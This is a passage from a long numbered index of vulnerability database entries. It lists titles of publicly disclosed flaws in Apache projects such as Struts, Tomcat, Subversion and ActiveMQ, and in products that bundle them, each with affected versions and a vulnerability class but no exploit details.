11806| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
11807| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
11808| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
11809| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
11810| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
11811| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
11812| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
11813| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
11814| [90263] Apache Archiva Header denial of service
11815| [90262] Apache Archiva Deserialize privilege escalation
11816| [90261] Apache Archiva XML DTD Connection privilege escalation
11817| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
11818| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
11819| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
11820| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
11821| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
11822| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
11823| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
11824| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
11825| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
11826| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
11827| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
11828| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
11829| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
11830| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
11831| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
11832| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
11833| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
11834| [87765] Apache James Server 2.3.2 Command privilege escalation
11835| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
11836| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
11837| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
11838| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
11839| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
11840| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
11841| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
11842| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
11843| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
11844| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
11845| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
11846| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
11847| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
11848| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
11849| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
11850| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
11851| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
11852| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
11853| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
11854| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
11855| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
11856| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
11857| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
11858| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
11859| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
11860| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
11861| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
11862| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
11863| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
11864| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
11865| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
11866| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
11867| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
11868| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
11869| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
11870| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
11871| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
11872| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
11873| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
11874| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
11875| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
11876| [82076] Apache Ranger up to 0.5.1 privilege escalation
11877| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
11878| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
11879| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
11880| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
11881| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
11882| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
11883| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
11884| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
11885| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
11886| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
11887| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
11888| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
11889| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
11890| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
11891| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
11892| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
11893| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
11894| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
11895| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
11896| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
11897| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
11898| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
11899| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
11900| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
11901| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
11902| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
11903| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
11904| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
11905| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
11906| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
11907| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
11908| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
11909| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
11910| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
11911| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
11912| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
11913| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
11914| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
11915| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
11916| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
11917| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
11918| [79791] Cisco Products Apache Commons Collections Library privilege escalation
11919| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
11920| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
11921| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
11922| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
11923| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
11924| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
11925| [78989] Apache Ambari up to 2.1.1 Open Redirect
11926| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
11927| [78987] Apache Ambari up to 2.0.x cross site scripting
11928| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
11929| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
11930| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
11931| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11932| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11933| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11934| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11935| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
11936| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
11937| [77406] Apache Flex BlazeDS AMF Message XML External Entity
11938| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
11939| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
11940| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
11941| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
11942| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
11943| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
11944| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
11945| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
11946| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
11947| [76567] Apache Struts 2.3.20 unknown vulnerability
11948| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
11949| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
11950| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
11951| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
11952| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
11953| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
11954| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
11955| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
11956| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
11957| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
11958| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
11959| [74793] Apache Tomcat File Upload denial of service
11960| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
11961| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
11962| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
11963| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
11964| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
11965| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
11966| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
11967| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
11968| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
11969| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
11970| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
11971| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
11972| [74468] Apache Batik up to 1.6 denial of service
11973| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
11974| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
11975| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
11976| [74174] Apache WSS4J up to 2.0.0 privilege escalation
11977| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
11978| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
11979| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
11980| [73731] Apache XML Security unknown vulnerability
11981| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
11982| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
11983| [73593] Apache Traffic Server up to 5.1.0 denial of service
11984| [73511] Apache POI up to 3.10 Deadlock denial of service
11985| [73510] Apache Solr up to 4.3.0 cross site scripting
11986| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
11987| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
11988| [73173] Apache CloudStack Stack-Based unknown vulnerability
11989| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
11990| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
11991| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
11992| [72890] Apache Qpid 0.30 unknown vulnerability
11993| [72887] Apache Hive 0.13.0 File Permission privilege escalation
11994| [72878] Apache Cordova 3.5.0 cross site request forgery
11995| [72877] Apache Cordova 3.5.0 cross site request forgery
11996| [72876] Apache Cordova 3.5.0 cross site request forgery
11997| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
11998| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
11999| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
12000| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
12001| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12002| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12003| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
12004| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
12005| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
12006| [71629] Apache Axis2/C spoofing
12007| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
12008| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
12009| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
12010| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
12011| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
12012| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
12013| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
12014| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
12015| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
12016| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
12017| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
12018| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
12019| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
12020| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
12021| [70809] Apache POI up to 3.11 Crash denial of service
12022| [70808] Apache POI up to 3.10 unknown vulnerability
12023| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
12024| [70749] Apache Axis up to 1.4 getCN spoofing
12025| [70701] Apache Traffic Server up to 3.3.5 denial of service
12026| [70700] Apache OFBiz up to 12.04.03 cross site scripting
12027| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
12028| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
12029| [70661] Apache Subversion up to 1.6.17 denial of service
12030| [70660] Apache Subversion up to 1.6.17 spoofing
12031| [70659] Apache Subversion up to 1.6.17 spoofing
12032| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
12033| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
12034| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
12035| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
12036| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
12037| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
12038| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
12039| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
12040| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
12041| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
12042| [69846] Apache HBase up to 0.94.8 information disclosure
12043| [69783] Apache CouchDB up to 1.2.0 memory corruption
12044| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
12045| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
12046| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
12047| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
12048| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
12049| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
12050| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
12051| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
12052| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
12053| [69431] Apache Archiva up to 1.3.6 cross site scripting
12054| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
12055| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
12056| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
12057| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
12058| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
12059| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
12060| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
12061| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
12062| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
12063| [66739] Apache Camel up to 2.12.2 unknown vulnerability
12064| [66738] Apache Camel up to 2.12.2 unknown vulnerability
12065| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
12066| [66695] Apache CouchDB up to 1.2.0 cross site scripting
12067| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
12068| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
12069| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
12070| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
12071| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
12072| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
12073| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
12074| [66356] Apache Wicket up to 6.8.0 information disclosure
12075| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
12076| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
12077| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12078| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
12079| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
12080| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12081| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12082| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
12083| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
12084| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
12085| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
12086| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
12087| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
12088| [65668] Apache Solr 4.0.0 Updater denial of service
12089| [65665] Apache Solr up to 4.3.0 denial of service
12090| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
12091| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
12092| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
12093| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
12094| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
12095| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
12096| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
12097| [65410] Apache Struts 2.3.15.3 cross site scripting
12098| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
12099| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
12100| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
12101| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
12102| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
12103| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
12104| [65340] Apache Shindig 2.5.0 information disclosure
12105| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
12106| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
12107| [10826] Apache Struts 2 File privilege escalation
12108| [65204] Apache Camel up to 2.10.1 unknown vulnerability
12109| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
12110| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
12111| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
12112| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
12113| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
12114| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
12115| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
12116| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
12117| [64722] Apache XML Security for C++ Heap-based memory corruption
12118| [64719] Apache XML Security for C++ Heap-based memory corruption
12119| [64718] Apache XML Security for C++ verify denial of service
12120| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
12121| [64716] Apache XML Security for C++ spoofing
12122| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
12123| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
12124| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
12125| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
12126| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
12127| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
12128| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
12129| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
12130| [64485] Apache Struts up to 2.2.3.0 privilege escalation
12131| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
12132| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
12133| [64467] Apache Geronimo 3.0 memory corruption
12134| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
12135| [64457] Apache Struts up to 2.2.3.0 cross site scripting
12136| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
12137| [9184] Apache Qpid up to 0.20 SSL misconfiguration
12138| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
12139| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
12140| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
12141| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
12142| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
12143| [8873] Apache Struts 2.3.14 privilege escalation
12144| [8872] Apache Struts 2.3.14 privilege escalation
12145| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
12146| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
12147| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
12148| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
12149| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
12150| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12151| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12152| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
12153| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
12154| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
12155| [64006] Apache ActiveMQ up to 5.7.0 denial of service
12156| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
12157| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
12158| [8427] Apache Tomcat Session Transaction weak authentication
12159| [63960] Apache Maven 3.0.4 Default Configuration spoofing
12160| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
12161| [63750] Apache qpid up to 0.20 checkAvailable denial of service
12162| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
12163| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
12164| [63747] Apache Rave up to 0.20 User Account information disclosure
12165| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
12166| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
12167| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
12168| [7687] Apache CXF up to 2.7.2 Token weak authentication
12169| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12170| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12171| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
12172| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
12173| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
12174| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
12175| [63090] Apache Tomcat up to 4.1.24 denial of service
